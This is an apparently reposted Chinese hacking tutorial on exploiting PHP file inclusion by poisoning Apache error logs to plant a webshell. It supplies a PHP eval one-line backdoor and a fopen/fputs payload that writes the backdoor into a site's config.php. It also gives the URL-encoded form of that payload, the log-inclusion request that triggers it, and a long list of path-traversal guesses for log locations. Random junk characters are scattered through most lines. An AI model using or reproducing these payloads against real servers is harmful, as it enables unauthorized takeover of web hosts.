php包含apache日志写马

admin

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。

比如还是这句一句话木马
6 e) y$ k3 T3 S<?eval($_POST[cmd]);?>   

$ U5 l* Z& P( ^, e$ c到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
( Z" I* f' |' o; w& N0 C' Sfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
$ ?8 ~* v5 G4 d6 x
/ i& `6 J/ F+ I- S<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
* i$ P1 i4 m9 t' |5 Ffclose($fp);?>   //在config.php里写入一句木马语句
% o" Y- ^% r2 l* r# E
5 H2 j# }4 T) X3 q  s我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
2 [, h! V- b  m/ Q- |# a$ f转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
3 x$ G; z% f* _0 t2 E' q7 }
: r) p- r+ y) s2 ~1 |这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志，提交
, Y/ d' k  J- X+ mhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
  c% L0 `; K+ Q: r, n  V2 S
这样webshell就写入成功了，config.php里就写入一句木马语句
OK.
http://www.xxx.com/forum/config.php这个就成了我们的webshell
0 t; H' m" E; j1 q) _# N* O* s直接用lanker的客户端一连，主机就是你的了。

4 ^. f3 f& V4 E$ z% [PS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
1 P# j' A: ~2 m6 r5 o3 w
  D% x+ b' G7 h4 o其他的日志路径，你可以去猜，也可以参照这里。
0 o/ P; i; y' Y4 E' B8 P" x../../../../../../../../../../var/log/httpd/access_log
3 c- i/ M' L: m2 }( N& T../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
$ _' h1 E  L0 `../apache/logs/access.log
../../apache/logs/error.log
1 B7 X0 p+ h' H& ^! X7 ]../../apache/logs/access.log
../../../apache/logs/error.log
6 T5 }1 W! {9 P! k  r( \../../../apache/logs/access.log
9 U3 @: Z" ]9 T6 K- v0 g../../../../../../../../../../etc/httpd/logs/acces_log
3 @2 L2 f6 l& R2 t; y8 L../../../../../../../../../../etc/httpd/logs/acces.log
7 d+ g9 N' `* }. S../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
, O7 ^7 d/ M; {../../../../../../../../../../var/www/logs/access_log
) x; d. p7 x2 q: P7 t../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
$ A* J8 ?1 m6 f- B0 l( Y4 c. X4 J% V0 T../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
: s0 v# P. P# v% \0 |1 `6 X../../../../../../../../../../var/log/apache/access.log
. @) f/ ]* i9 Y1 Z- z- b. A/ @../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
6 B3 y9 R4 J4 w$ C3 w; f" J% r../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log      
' z, c' S9 I0 }3 _- W/var/log/httpd/error_log     
/ \: y. A3 d7 O& [! A/ q../apache/logs/error.log     
8 k( I3 ]/ C  u+ m# v1 x../apache/logs/access.log
) K3 H/ O! \/ }" x  u! k../../apache/logs/error.log
../../apache/logs/access.log
+ T5 J& }- @( F' o$ C" B../../../apache/logs/error.log
../../../apache/logs/access.log
7 {( g7 E6 h+ n! x, |6 q/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
6 K2 ?; `$ C! i. N! A- m) J* K4 B' H/etc/httpd/logs/error_log
% x) K* [4 f! \" v: Y2 M  T$ E- ~8 v( y/etc/httpd/logs/error.log
/var/www/logs/access_log
3 b0 \$ Y* y; k3 j' @! ~) t0 y/var/www/logs/access.log
5 Q. J" y1 z/ g9 H; e' `: k' d$ E/usr/local/apache/logs/access_log
/ g6 x$ {% m2 H' a! y7 O5 y/usr/local/apache/logs/access.log
/var/log/apache/access_log
* j4 v) }5 \9 z0 ?8 h! k; q/var/log/apache/access.log
( O+ z  n- R! P6 ?# Q/var/log/access_log
/var/www/logs/error_log
0 }1 j2 O) B2 m6 C' W2 J4 |& J! I/var/www/logs/error.log
/usr/local/apache/logs/error_log
" R2 A" E2 D5 W3 o. ~" j* N/usr/local/apache/logs/error.log
2 y# `- H0 c2 G8 ^# F% ?. L/var/log/apache/error_log
  `/ g; A; T0 }1 U; M/var/log/apache/error.log
/var/log/access_log
/var/log/error_log